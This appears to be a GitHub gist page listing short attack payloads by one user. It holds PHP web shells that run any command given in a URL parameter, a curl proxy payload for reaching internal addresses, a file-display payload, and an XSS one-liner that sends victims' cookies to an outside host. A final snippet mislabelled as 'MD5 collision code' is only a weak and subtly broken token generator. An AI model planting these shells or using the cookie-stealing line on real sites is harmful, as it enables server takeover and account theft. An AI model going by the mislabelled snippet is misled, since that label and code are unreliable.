Allaeddine dino213dz
dino213dz / img.php
Created August 17, 2019 15:03
Payload that displays any picture on a website with Apache privileges
<HEAD><TITLE><?php echo $_GET['file'] ?></TITLE></HEAD><BODY><IMG src="<?php echo $_GET['file'] ?>" width="100%" height="100%" /></BODY>
dino213dz / nav.php
Created August 17, 2019 15:07
Payload that runs a curl request and shows the result. Useful when you need to access a local IP from an internet web interface.
<?php echo shell_exec('curl '.$_GET['options'].' '.$_GET['url'].' 2>&1'); ?>
dino213dz / cmd.php
Created August 17, 2019 15:09
Payload that allows running commands and displays them correctly on a web page
<?php
$cde=$_GET['cmd'];
$options=$_GET['options'];
$commande=$cde.' '.$options;
$console_symbol='<b>&nbsp;&gt;&nbsp;</b>';
echo '<html><head><title>'.$commande.'</title></head><body>';
echo $console_symbol.' '.$commande.' : <HR>';
$retour_cde=shell_exec(''.$commande.' 2>&1 >/tmp/cmd.log;while read ligne; do echo $ligne"</BR>"; done < /tmp/cmd.log');
$retour_cde=str_replace(' ','&nbsp;',$retour_cde);
dino213dz / shell.php
Last active September 10, 2019 10:43
Simple Shell Payload
<html><head><title><?php echo $_GET['cmd'].' '.$_GET['options'] ?></title></head><body>
<?php echo shell_exec($_GET['cmd'].' '.$_GET['options']); ?>
</body></html>
dino213dz / xss.js
Created August 17, 2019 15:24
XSS Cookie Steal technique using JavaScript
document.location="http://site.me/csrf_store.php?doc_cookies="+document.cookie;
dino213dz / genMd5PlusSalt.php
Created September 9, 2019 17:17
MD5 collision code: generate a token with salt using a random number
<?php
$salt = microtime();
$generated_token = MD5('$salt' . rand(1, 100));
echo $generated_token;
?>